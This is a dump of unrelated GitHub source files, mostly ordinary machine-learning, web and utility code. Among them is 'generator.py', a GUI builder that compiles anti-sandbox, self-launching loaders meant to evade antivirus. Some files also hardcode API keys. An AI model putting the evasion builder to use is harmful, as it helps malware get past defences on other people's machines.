\"__main__\":\n weatherIndicator = WeatherIndicator('Weather indicator', os.path.dirname(os.path.realpath(__file__)) + \"/icons/contrast.png\")\n","repo_name":"wjcwleklinski/WeatherPanelIndicator","sub_path":"weather_indicator.py","file_name":"weather_indicator.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20525946293","text":"import torch\nfrom torch import nn\n\n\nclass HarmonNet(nn.Module):\n def __init__(self, no_entities, no_relationships, device, encoding_dim=10, lambda_=1.,):\n super().__init__()\n torch.manual_seed(42)\n self.NO_ENTITIES = no_entities\n self.NO_RELATIONSHIPS = no_relationships\n self.ENCODING_DIM = encoding_dim\n self.entities_embedding = nn.Embedding(no_entities, encoding_dim)\n self.relation_embedding = nn.Embedding(no_relationships, encoding_dim)\n self.W = torch.nn.Parameter(torch.rand(self.ENCODING_DIM, self.ENCODING_DIM))\n self.lambda_ = lambda_\n self.b = torch.nn.Parameter(torch.rand(self.ENCODING_DIM, requires_grad=True))\n self.rnn = torch.nn.RNN(input_size=encoding_dim, hidden_size=1, num_layers=1, nonlinearity='relu')\n self.loss_func = torch.nn.LogSoftmax(dim=1)\n self.device = device\n\n def loss(self, y_pred):\n \"\"\"\n compute the batch loss\n \"\"\"\n softmax = -self.loss_func(y_pred)\n result = torch.sum(softmax[:, 0])\n return result\n\n def forward(self, samples):\n \"\"\"\n Deal with a single train item -> batch\n samples [(e1,r,e2), ...]\n \"\"\"\n e1s, rs, e2s = samples[:, :, 0], samples[:, :, 1], samples[:, :, 2]\n # assert e1s.shape == (samples.shape[0], samples.shape[1])\n entity_1 = self.entities_embedding(e1s)\n entity_2 = self.entities_embedding(e2s)\n r = self.relation_embedding(rs)\n x = self.harmonic_holograhpic_embedding(entity_1, r, entity_2)\n batch_result = self.score(x)\n return batch_result\n\n def harmonic_holograhpic_embedding(self, e1, r, e2):\n return r * self._circular_correl(e1, e2)\n\n def _circular_correl(self, e1, e2):\n ccorel = torch.irfft(torch.conj(torch.rfft(e1, 1, onesided=False)) * torch.rfft(e2, 1, onesided=False),\n 1, onesided=False)\n return ccorel\n\n def _2d_norm_batch(self, x):\n \"\"\"\n norm based on last dimension\n \"\"\"\n result = torch.einsum('...k,...k', x, x)\n return result\n\n def H(self, h, x):\n diff = h - x\n Wsym = (self.W + self.W.t()).to(self.device)\n hW = torch.einsum('...ij,jk', h, Wsym)\n result = torch.einsum('ijk,ikj->ij', hW, h.transpose(1, 2)) + \\\n torch.einsum('...k,k', h, self.b) - \\\n self.lambda_ * self._2d_norm_batch(diff)\n # assert result.shape == torch.Size([x.shape[0], x.shape[1]])\n return result\n\n def muy(self, x):\n Wsym = self.W + self.W.t()\n V = Wsym - (self.lambda_ * torch.eye(self.ENCODING_DIM)).to(self.device)\n V = V.inverse()\n r = torch.einsum('ijk,kt', -0.5 * self.b + self.lambda_ * x, V)\n # assert r.shape == x.shape\n # for i in range(x.shape[0]):\n # assert (-0.5 * self.b + self.lambda_ * x[i]).mm(V).allclose(r[i],atol=3e-7)\n return r\n\n def score(self, x):\n return self.H(self.muy(x), x)\n","repo_name":"minhtriet/knowledge_embed","sub_path":"harmon_net.py","file_name":"harmon_net.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24063231790","text":"import os\ndef rename_files():\n #(1) get file names from a folder\n path = '/Users/kseidl/Documents/Udacity/Python/prank/'\n file_list = os.listdir(path)\n os.chdir(path)\n 
print(file_list)\n\n    #(2) for each file, rename filename\n    for file_name in file_list:\n        print(\"Old Name -\" +file_name)\n        os.rename(file_name, file_name.translate(None, \"0 1 2 3 4 5 6 7 8 9\"))\n        print(\"New Name -\" + file_name)\n    \nrename_files()\n","repo_name":"KathiSR/LearningPython_Udacity","sub_path":"rename_files.py","file_name":"rename_files.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9805047793","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import stats\n\nif __name__ == \"__main__\":\n    params = [0.5, 1, 2, 3]\n    x = np.linspace(0, 1, 100)\n    f, ax = plt.subplots(len(params), len(params), sharex=True, sharey=True)\n    for i in range(4):\n        for j in range(4):\n            a = params[i]\n            b = params[j]\n            y = stats.beta(a, b).pdf(x)\n            ax[i, j].plot(x, y)\n            ax[i, j].plot(\n                0,\n                0,\n                label=\"$\\\\alpha$ = {:3.2f}\\n$\\\\beta$ = {:3.2f}\".format(a, b),\n                alpha=0,\n            )\n            ax[i, j].legend(fontsize=12)\n\n    ax[3, 0].set_xlabel(\"$\\\\theta$\", fontsize=14)\n    ax[0, 0].set_ylabel(\"$p(\\\\theta)$\", fontsize=14)\n    plt.show()\n","repo_name":"tinylambda/keep","sub_path":"playground/stats/bayes/bayes_beta.py","file_name":"bayes_beta.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40060120707","text":"from gui import Ui_MainWindow\n\n# Import the modules required to run the program\nimport sys\nimport os\n# The basic PyQt5 widgets all live in the PyQt5.QtWidgets module\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog, QMessageBox\nfrom PyQt5.QtCore import Qt\n\n\nclass MyMainForm(QMainWindow, Ui_MainWindow):\n    def __init__(self, parent=None):\n        super(MyMainForm, self).__init__(parent)\n        self.setupUi(self)\n        self.pushButton_select.clicked.connect(self.open_file)\n        self.pushButton_generator.clicked.connect(self.generator)\n\n    def open_file(self):\n        fileName, fileType = QFileDialog.getOpenFileName(\n            self, \"Select file\", os.path.dirname(__file__),\n            \"All Files(*);;Text Files(*.txt)\")\n        self.lineEdit_file_select.setText(fileName)\n\n    def generator(self):\n        print(\"i am generator\")\n        os.chdir(os.path.dirname(__file__))\n        f = open(\"config\", \"w\")\n        f.write(self.lineEdit_file_select.text() + \"\\n\")\n        if self.checkBox_selflaunch.checkState() == Qt.Checked:\n            f.write(\"selflaunch:1\\n\")\n        else:\n            f.write(\"selflaunch:0\\n\")\n        if self.checkBox_antisandbox.checkState() == Qt.Checked:\n            f.write(\"antisandbox:1\\n\")\n        else:\n            f.write(\"antisandbox:0\\n\")\n        f.write(self.comboBox_LoadMethed.currentText())\n        f.close()\n        is32 = \"\"\n        if self.checkBox_is32.checkState() == Qt.Checked:\n            is32 = \"-m32\"\n        os.system(r\"g++ load/{}.cpp {} -mwindows --static -o bin/{}\".format(\n            self.comboBox_LoadMethed.currentText(), is32,\n            self.comboBox_LoadMethed.currentText()))\n        os.system(r\".\\load\\myMiansha.exe\")\n        if (os.path.exists(r\"bin/{}.exe\".format(\n                self.comboBox_LoadMethed.currentText()))):\n            QMessageBox.about(self, \"succeed\", \"Generated in the bin directory\")\n        else:\n            QMessageBox.about(self, \"Failed\", \"Generation error\")\n\n\nif __name__ == \"__main__\":\n    # Boilerplate: every PyQt5 program needs a QApplication object. sys.argv is the command-line argument list, which also lets the program be launched by double-clicking\n    app = QApplication(sys.argv)\n    # Initialize\n    myWin = MyMainForm()\n    # Show the window widgets on screen\n    myWin.show()\n    # Run the program; the sys.exit call ensures a clean exit.\n    
sys.exit(app.exec_())","repo_name":"s1vona/myAntiAV","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"36200546187","text":"import unittest\nimport tracemalloc\nimport asyncio\nfrom unittest.mock import AsyncMock, patch\nfrom fastapi.testclient import TestClient\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom src.schemas import UserDb, UpdateUserProfileModel\nfrom src.routes.user_profile import profile_router\nfrom src.database.models import User\nfrom src.services.auth import auth_service\nfrom src.conf.config import settings\nfrom datetime import datetime\n\ntracemalloc.start()\n\nclass TestProfileRouter(unittest.TestCase):\n \"\"\"\n Unit tests for the user profile router.\n\n This class contains test cases for the profile router functionality,\n including getting user profiles, updating user profiles, and handling\n various error scenarios.\n \"\"\"\n def setUp(self) -> None:\n \"\"\"\n Set up the test environment before each test case.\n \"\"\"\n self.session = AsyncMock(spec=AsyncSession())\n\n def tearDown(self) -> None:\n \"\"\"\n Clean up the test environment after each test case.\n \"\"\"\n del self.session\n\n async def test_get_user_profile(self):\n \"\"\"\n Test the GET request to retrieve a user profile.\n\n This test case mocks the database interaction and checks if the expected\n user profile data is returned in the response.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n mock_user = UserDb(\n id=1,\n role_id=1,\n first_name=\"John\",\n last_name=\"Doe\",\n created_at=datetime.utcnow(),\n avatar=\"path/to/avatar\",\n username=\"testuser\",\n email=\"test@example.com\",\n )\n mock_db = AsyncMock(spec=AsyncSession())\n mock_db.execute.return_value.scalars().first.return_value = mock_user\n\n with patch(\"src.repository.users.get_user_by_username\", return_value=mock_user):\n response = await self.client.get(\"/profile/testuser\")\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json(), mock_user.dict())\n\n async def test_get_nonexistent_user_profile(self):\n \"\"\"\n Test the GET request to retrieve a nonexistent user profile.\n\n This test case mocks the database interaction and checks if a 404 response\n is returned with the appropriate detail.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n with patch(\"src.repository.users.get_user_by_username\", return_value=None):\n response = await self.client.get(\"/profile/nonexistentuser\")\n\n self.assertEqual(response.status_code, 404)\n self.assertEqual(response.json(), {\"detail\": \"User not found\"})\n\n async def test_get_own_profile_unauthorized(self):\n \"\"\"\n Test the GET request to retrieve the user's own profile when unauthorized.\n\n This test case mocks the authentication service and checks if a 401 response\n is returned with the appropriate detail.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n with patch(\"src.services.auth_service.get_current_user\", return_value=None):\n response = await self.client.get(\"/profile/me/\")\n\n self.assertEqual(response.status_code, 401)\n self.assertEqual(response.json(), {\"detail\": \"Not authenticated\"})\n\n async def test_update_own_profile_invalid_data(self):\n \"\"\"\n Test the PUT request to update the user's own profile with invalid 
data.\n\n This test case mocks the authentication service and checks if a 401 response\n is returned with the appropriate detail.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n mock_update_data = UpdateUserProfileModel(username=\"newusername\")\n with patch(\"src.services.auth_service.get_current_user\", return_value=None):\n response = await self.client.put(\"/profile/me/\", json=mock_update_data.dict())\n\n self.assertEqual(response.status_code, 401)\n self.assertEqual(response.json(), {\"detail\": \"Not authenticated\"})\n\n async def test_update_user_avatar_invalid_file(self):\n \"\"\"\n Test the PATCH request to update the user's avatar with an invalid file.\n\n This test case mocks the cloudinary upload and user repository functions and\n checks if a 400 response is returned with the appropriate detail.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n with patch(\"cloudinary.uploader.upload\", side_effect=Exception(\"Invalid file\")), \\\n patch(\"src.repository.users.update_avatar\", return_value=None):\n response = await self.client.patch(\"/profile/avatar\", files={\"file\": (\"test.txt\", b\"invalidfile\")})\n\n self.assertEqual(response.status_code, 400)\n self.assertEqual(response.json(), {\"detail\": \"Invalid file format\"})\n\n async def test_update_password_invalid_token(self):\n \"\"\"\n Test the PATCH request to update the user's password with an invalid token.\n\n This test case mocks the authentication service and checks if a 400 response\n is returned with the appropriate detail.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n mock_new_password_data = {\"new_password\": \"newpass\", \"confirm_password\": \"newpass\", \"token\": \"invalidtoken\"}\n with patch(\"src.services.auth_service.get_email_from_token\", side_effect=Exception(\"Invalid token\")):\n response = await self.client.patch(\"/profile/update-password\", json=mock_new_password_data)\n\n self.assertEqual(response.status_code, 400)\n self.assertEqual(response.json(), {\"detail\": \"Invalid token\"})\n\n async def test_update_email_user_not_found(self):\n \"\"\"\n Test the PATCH request to update the user's email when the user is not found.\n\n This test case mocks the authentication service and user repository functions\n and checks if a 404 response is returned with the appropriate detail.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n mock_new_email_data = {\"new_email\": \"newemail@example.com\", \"token\": \"mocktoken\"}\n with patch(\"src.services.auth_service.get_email_from_token\", return_value=\"test@example.com\"), \\\n patch(\"src.repository.users.get_user_by_email\", return_value=None):\n response = await self.client.patch(\"/profile/update-email\", json=mock_new_email_data)\n\n self.assertEqual(response.status_code, 404)\n self.assertEqual(response.json(), {\"detail\": \"User not found\"})\n\n async def test_update_user_role_invalid_role(self):\n \"\"\"\n Test the PUT request to update the user's role with an invalid role.\n\n This test case mocks the role repository function and checks if a 404 response\n is returned with the appropriate detail.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n mock_role_data = {\"role_id\": 99, \"username\": \"testuser\"}\n with patch(\"src.repository.roles.get_role\", return_value=None):\n response = await 
self.client.put(\"/profile/role\", data=mock_role_data)\n\n self.assertEqual(response.status_code, 404)\n self.assertEqual(response.json(), {\"detail\": \"Role not found\"})\n\nif __name__ == \"__main__\":\n asyncio.run(unittest.main())","repo_name":"GkiriChen/test_proect_14_2_web","sub_path":"tests/test_user_profile.py","file_name":"test_user_profile.py","file_ext":"py","file_size_in_byte":7601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10403634666","text":"import logging\nfrom flask import jsonify\nfrom bank_api.database import db\nfrom bank_api.models.user import User\nfrom flask_restful import Resource\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\n\nHOME_ENDPOINT = \"/home\"\nlogger = logging.getLogger(__name__)\n\nclass HomeResource(Resource):\n @jwt_required()\n def get(self):\n username = get_jwt_identity()\n user = db.one_or_404(\n db.select(User).filter_by(username = username),\n description=f\"No user named '{username}'\")\n user_dict = user.__dict__\n user_dict.pop('_sa_instance_state')\n user_dict.pop('id')\n user_dict.pop('password')\n user_dict.pop('code')\n user_dict['birthday'] = user_dict['birthday'].strftime(\"%Y-%m-%d\")\n #print(user_dict)\n return jsonify(user_dict)\n","repo_name":"aolguin89/banking-api","sub_path":"bank_api/resources/home_resource.py","file_name":"home_resource.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23110621601","text":"from argparse import ArgumentParser\nfrom common.util import load_hyperparams, merge_dict, one_hot_encode\nimport numpy as np\nimport os\nfrom tensorflow.contrib import learn\nfrom text_classification_benchmarks.data_loader import clean_data, load_data, remove_classes_with_too_few_examples\nfrom text_classification_benchmarks.word_cnn.model_setup import TextCNN\nfrom text_classification_benchmarks.word_cnn.util import preprocess, save_eval_to_csv, test, train\n\n\ndef run(constant_overwrites):\n config_path = os.path.join(os.path.dirname(__file__), 'hyperparams.yml')\n constants = merge_dict(load_hyperparams(config_path), constant_overwrites)\n train_df, val_df, test_df, classes = load_data(dirname=constants['data_dir'])\n train_df = remove_classes_with_too_few_examples(clean_data(train_df))\n val_df = remove_classes_with_too_few_examples(clean_data(val_df))\n n_classes = len(classes)\n batch_size = constants['batch_size']\n allow_soft_placement = constants['allow_soft_placement']\n log_device_placement = constants['log_device_placement']\n if constants['test']:\n print('\\nTesting...')\n x_raw = val_df.utterance.values\n checkpoint_dir = constants['checkpoint_dir']\n vocab_path = os.path.join(checkpoint_dir, '..', 'vocab')\n vocab_processor = learn.preprocessing.VocabularyProcessor.restore(vocab_path)\n x_test = np.array(list(vocab_processor.transform(x_raw)))\n # y_test = one_hot_encode(val_df.label.values, n_classes)\n y_test = val_df.label.values\n preds = test(x_test, batch_size, checkpoint_dir, allow_soft_placement, log_device_placement, y_test)\n save_eval_to_csv(x_raw, preds, checkpoint_dir)\n else:\n print('\\nTraining...')\n x_train, y_train, x_val, y_val, vocab_processor = preprocess(train_df, val_df, n_classes)\n # model = TextCNN(seq_len=x_train.shape[1], n_classes=y_train.shape[1],\n # vocab_size=len(vocab_processor.vocabulary_),\n # embed_size=constants['embed_size'],\n # filter_sizes=constants['filter_sizes'],\n # 
n_filters=constants['n_filters'],\n # l2_reg_lambda=constants['l2_reg_lambda'])\n train(x_train, y_train, x_val, y_val, vocab_processor, model=None,\n learning_rate=constants['learning_rate'],\n n_checkpoints=constants['n_checkpoints'],\n keep_prob=constants['keep_prob'],\n batch_size=batch_size,\n n_epochs=constants['n_epochs'],\n evaluate_every=constants['evaluate_every'],\n checkpoint_every=constants['checkpoint_every'],\n allow_soft_placement=allow_soft_placement,\n log_device_placement=log_device_placement,\n constants=constants)\n\n\nif __name__ == '__main__':\n # read args\n parser = ArgumentParser(description='Run Word-CNN Classifier')\n parser.add_argument('--epochs', dest='n_epochs', type=int, help='number epochs')\n parser.add_argument('--batch-size', dest='batch_size', type=int, help='batch size')\n parser.add_argument('--embedding-size', dest='embed_size', type=int, help='embedding size')\n parser.add_argument('--filter-sizes', dest='filter_sizes', type=str, help='comma-separated filter sizes')\n parser.add_argument('--learning-rate', dest='learning_rate', type=float, help='learning rate')\n parser.add_argument('--data-dir', dest='data_dir', type=str, help='relative path to data')\n parser.add_argument('--checkpoint-dir', dest='checkpoint_dir', type=str,\n help='checkpoint directory from training run')\n parser.add_argument('--word2vec-filename', dest='word2vec_filename', type=str,\n help='path to word2vec embeddings file')\n parser.add_argument('--test', dest='test',\n help='run eval on the test dataset using a fixed checkpoint', action='store_true')\n parser.set_defaults(test=False)\n args = parser.parse_args()\n args_dict = vars(args)\n if args_dict['filter_sizes']:\n args_dict['filter_sizes'] = [x for x in args_dict['filter_sizes'].split(',')]\n\n run(args_dict)\n","repo_name":"markmo/dltemplate","sub_path":"src/text_classification_benchmarks/word_cnn/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"21"} +{"seq_id":"29501606911","text":"#!/usr/bin/env python3\n\nAPI=\"qervegelclrmbvcdhpvvmebpnyxgjknysayt\"\nHOST=\"172.31.255.30\"\nPORT=3324\n\nimport LedgerCompliance.client\nimport string\nimport random\nimport time\n\ncli=LedgerCompliance.client.Client(API, HOST, PORT)\ncli.connect()\n\ndef get_random_string(length):\n letters = string.ascii_lowercase\n ret = ''.join(random.choice(letters) for i in range(length))\n return ret\n\nKEY=\"LC_history\".encode('ascii')\nfor i in range(0,10):\n\tcli.set(KEY, get_random_string(16).encode('ascii'))\n\nret=cli.history(KEY)\nfor h in ret:\n\tprint(\"{:d}: {:s}\".format(h.index, h.value.decode('ascii')))\n","repo_name":"vchain-us/ledger-compliance-py","sub_path":"examples/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"40453110787","text":"import keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nimport pickle, os\nimport numpy as np\nfrom Naked.toolshed.shell import muterun_js\nimport sys\nimport requests, random\nimport tensorflow as tf\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n\ndef save_model(filename, model):\n pickle.dump(model, open(filename, 'wb'))\n\ndef load_model(filename):\n return pickle.load(open(filename, 
'rb'))\n\n\ndef get_score(ip):\n url = \"https://ipqualityscore.com/api/json/ip/F5FEG8NGn0stGDfizWPf7ylxu3iNqnX4/\" + ip\n response = requests.get(url).json()\n # print(response)\n return response['fraud_score']\n\n\ndef get_inputs(path, file_name, ip):\n os.chdir(path)\n file = os.path.join(path, file_name)\n x = file_name + ' ' + ip\n output = muterun_js(x)\n s = output.stdout\n s = str(s).strip()[2:-3]\n print(s)\n return s\n\n\ndef retrain(ip_list):\n\n model_folder = \"../ai-server/models\"\n\n model_names = os.listdir(model_folder)\n models = []\n\n for m in model_names:\n model_path = os.path.join(model_folder, m)\n model = load_model(model_path)\n models.append(model)\n\n\n curr_dir = os.getcwd()\n os.chdir(curr_dir)\n inp_folder = \"../whois\"\n file_name = \"getInspectorScores.js\"\n\n\n x_train, y_train = [], []\n\n random.shuffle(ip_list)\n\n for ip in ip_list[:3]:\n inputs = get_inputs(inp_folder, file_name, ip).split()\n\n x = list(map(float, inputs))\n # print(x)\n try:\n y = int(get_score(ip))\n except:\n continue\n\n y = np.array(y)\n\n x_train.append(x)\n y_train.append(y)\n\n\n x_train, y_train = np.array(x_train), np.array(y_train)\n # print(x_train.shape, y_train.shape)\n\n for model in models:\n model.fit(x_train, y_train, batch_size=10, nb_epoch=30)\n\n print(\"Model Trained!\")","repo_name":"dyingg/rk311_infowise-pub-","sub_path":"src/main/scraper-module/AI_retrain.py","file_name":"AI_retrain.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"36243271462","text":"from __future__ import absolute_import\n\nfrom requests.exceptions import HTTPError\nfrom sentry.http import build_session\nfrom sentry.utils.http import absolute_uri\n\nfrom sentry_plugins.exceptions import ApiError\n\n# https://v2.developer.pagerduty.com/docs/events-api\nINTEGRATION_API_URL = \\\n 'https://events.pagerduty.com/generic/2010-04-15/create_event.json'\n\n\nclass PagerDutyClient(object):\n client = 'sentry'\n\n def __init__(self, service_key=None):\n self.service_key = service_key\n\n def request(self, data):\n payload = {\n 'service_key': self.service_key,\n }\n payload.update(data)\n\n session = build_session()\n try:\n resp = session.post(\n url=INTEGRATION_API_URL,\n json=payload,\n allow_redirects=False,\n )\n resp.raise_for_status()\n except HTTPError as e:\n raise ApiError.from_response(e.response)\n return resp.json()\n\n def trigger_incident(self, description, event_type, details, incident_key,\n client=None, client_url=None, contexts=None):\n return self.request({\n 'event_type': event_type,\n 'description': description,\n 'details': details,\n 'incident_key': incident_key,\n 'client': client or self.client,\n 'client_url': client_url or absolute_uri(),\n 'contexts': contexts,\n })\n","repo_name":"Mattlk13/sentry","sub_path":"src/sentry_plugins/pagerduty/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37084620241","text":"import cv2\nimport os\nimport numpy as np\n\ndef heatmap_percentage(image_path, lower_threshold, upper_threshold):\n image = cv2.imread(image_path)\n hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n mask = cv2.inRange(hsv_image, lower_threshold, upper_threshold)\n heatmap_pixels = np.count_nonzero(mask)\n\n total_pixels = image.shape[0] * image.shape[1]\n percentage = (heatmap_pixels / total_pixels) * 100\n\n return 
percentage\n\ndef max_heatmap_coordinates(image_path, lower_threshold, upper_threshold):\n    image = cv2.imread(image_path)\n    hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n    mask = cv2.inRange(hsv_image, lower_threshold, upper_threshold)\n    max_intensity = np.max(mask)\n    max_coordinates = np.argwhere(mask == max_intensity)\n\n    return max_coordinates\n\nroot_directory = './Results'\n\nred_lower_threshold = np.array([0, 70, 150])\nred_upper_threshold = np.array([10, 255, 255])\n\nyellow_lower_threshold = np.array([20, 100, 150])\nyellow_upper_threshold = np.array([35, 255, 255])\n\ngreen_lower_threshold = np.array([60, 90, 120])\ngreen_upper_threshold = np.array([80, 255, 255])\n\nfor directory, _, files in os.walk(root_directory):\n    for filename in os.listdir(directory):\n        if filename.endswith(\".jpg\") or filename.endswith(\".png\"):\n            image_path = os.path.join(directory, filename)\n\n            red_percentage = heatmap_percentage(image_path, red_lower_threshold, red_upper_threshold)\n            yellow_percentage = heatmap_percentage(image_path, yellow_lower_threshold, yellow_upper_threshold)\n            green_percentage = heatmap_percentage(image_path, green_lower_threshold, green_upper_threshold)\n\n            print(f\"Percentage of heatmap coverage in {directory}/{filename}:\")\n            print(f\" Red: {red_percentage:.2f}%\")\n            print(f\" Yellow: {yellow_percentage:.2f}%\")\n            print(f\" Green: {green_percentage:.2f}%\")\n\n    for filename in os.listdir(directory):\n        if filename.endswith(\".jpg\") or filename.endswith(\".png\"):\n            image_path = os.path.join(directory, filename)\n\n            red_coordinates = max_heatmap_coordinates(image_path, red_lower_threshold, red_upper_threshold)\n            yellow_coordinates = max_heatmap_coordinates(image_path, yellow_lower_threshold, yellow_upper_threshold)\n            green_coordinates = max_heatmap_coordinates(image_path, green_lower_threshold, green_upper_threshold)\n\n            print(f\"Coordinates of most intense heatmap colors in {directory}/{filename}:\")\n            print(f\" Red: {red_coordinates}\")\n            print(f\" Yellow: {yellow_coordinates}\")\n            print(f\" Green: {green_coordinates}\")\n","repo_name":"polo-sec/heatmap_image_density_analyser","sub_path":"heatmap_image_density_analyser.py","file_name":"heatmap_image_density_analyser.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74493555254","text":"import sys\nif sys.version_info < (3, 10):\n    raise Exception(\"Python Version Out Of Date! 
Minimum Required: 3.10.0\")\n\nimport argparse\nimport asyncio\nimport signal\nimport traceback\n\nfrom obsidian.server import Server\nfrom obsidian.log import Logger\n\n\nasync def main():\n # Initiate Argument Parser\n parser = argparse.ArgumentParser(description=\"Project Obsidian - Open Source Minecraft Classic Server Reverse Engineer And Reimplementation Project\")\n # parser.add_argument('-x', \"--TEMPLATE\", type=int, nargs='?', help=\"TEMPLATE\", default=TEMPLATE)\n parser.add_argument('-a', \"--address\", type=str, nargs='?', help=\"The Address The Minecraft Server Would Bind To.\", default=\"0.0.0.0\")\n parser.add_argument('-p', \"--port\", type=int, nargs='?', help=\"The Port The Minecraft Server Would Bind To.\", default=25565)\n parser.add_argument('-n', \"--name\", type=str, nargs='?', help=\"The Name Of The Minecraft Server\", default=\"Minecraft Server\")\n parser.add_argument('-m', \"--motd\", type=str, nargs='?', help=\"The MOTD Of The Minecraft Server\", default=\"Python Server Implementation\")\n parser.add_argument('-d', \"--debug\", help=\"Enable Debug Logging\", action=\"store_true\")\n parser.add_argument('-v', \"--verbose\", help=\"Increase Debug Output Verbosity\", action=\"store_true\")\n parser.add_argument('-q', \"--quiet\", help=\"Disabled Logging To File\", action=\"store_true\")\n parser.add_argument('-s', \"--server\", help=\"Auto-Denys Confirmation Dialogs\", action=\"store_true\")\n parser.add_argument('-nc', \"--no-color\", help=\"Disable Color While Logging\", action=\"store_true\")\n args = parser.parse_args()\n\n # Set Logging Levels\n Logger.DEBUG = args.debug\n Logger.VERBOSE = args.verbose\n Logger.SERVER_MODE = args.server\n Logger.COLOR = not args.no_color\n\n # Set Up Logging File\n if not args.quiet:\n Logger.setupLogFile()\n\n # Create and Init Main Server\n server = Server(args.address, args.port, args.name, args.motd, color=True)\n await server.init()\n asyncio.create_task(server.run())\n\n # Capture and Handle Crl-C\n signal.signal(\n signal.SIGINT,\n server.asyncStop # Use this function to run async stop from outside async\n )\n\n # Capture SIGTERM and handle it\n if hasattr(signal, \"SIGTERM\"):\n signal.signal(\n signal.SIGTERM,\n server.asyncStop # Use this function to run async stop from outside async\n )\n\n # Capture SIGQUIT and handle it\n if hasattr(signal, \"SIGQUIT\"):\n signal.signal(\n signal.SIGQUIT,\n server.asyncStop # Use this function to run async stop from outside async\n )\n\n # Busy Operation To Keep Main Thread Alive\n # In the future, this would be dominated by a console thread\n while True:\n await asyncio.sleep(1)\n\n\n# Make sure main gets asynced when run\nif __name__ == \"__main__\":\n try:\n asyncio.run(main())\n except Exception as e:\n Logger.fatal(f\"Unhandled Server Exception - {type(e).__name__}: {e}\", module=\"main\", printTb=False)\n traceback.print_exc()\n","repo_name":"EdwardJXLi/ProjectObsidian","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"42119894052","text":"# -*- coding: utf-8 -*-\n\"\"\"Module compliance_suite.functions.schema.py\n\nFunctions to create dynamic JSON schemas according to test case. 
Each function\nin this module should write a temporary JSON schema file that is used in the \nvalidation section of API testing and return its filename\n\"\"\"\n\nimport compliance_suite.config.constants as c\nimport compliance_suite.schema_validator as sv\nimport json\nimport os\n\ndef render_and_write_temp_schema(output_filename, template, replace_l):\n \"\"\"Write a temporary schema file\n \n Renders a temporary schema file from a template. Each element in the \n replacement list indicates a string to replace in the template file, as\n well as what to replace it with\n\n Arguments:\n output_filename (str): output file path\n template (str): JSON schema template filename\n replace_l (list): replacement list\n \"\"\"\n\n # open the template schema\n schema_dir = os.path.dirname(sv.__file__) \\\n + \"/\" + c.SCHEMA_RELATIVE_DIR\n template_file = schema_dir + \"/\" + template\n json = open(template_file, \"r\").read()\n\n # for each item in the replacement list, replace the placeholder text\n # in the template, with the true value to be output to the temporary\n # schema\n for replace in replace_l:\n json = json.replace(replace[0], replace[1])\n\n # write the temporary schema file\n out_path = schema_dir + \"/\" + output_filename\n open(out_path, \"w\").write(json)\n\ndef render_endpoint_object_and_array(obj_filename, obj_template, obj_replace_l,\n arr_filename, arr_template, arr_replace_l, value, full=False):\n \"\"\"Render a temporary schema object, and an array full of temp objects\n\n Arguments:\n obj_filename (str): filename for object\n obj_template (str): JSON schema template file for object\n obj_replace_l (list): replacement list for object\n arr_filename (str): filename for array\n arr_template (str): JSON schema template file for array\n arr_replace_l (list): replacement list for array\n value (str): value to differentiate temp file\n full (bool): if full, set minItems to 1 for the array schema\n \"\"\"\n \n # render the object schema\n render_and_write_temp_schema(obj_filename, obj_template, obj_replace_l)\n\n if full:\n arr_replace_l.append(['\"minItems\": 0', '\"minItems\": 1'])\n\n # render the array schema\n 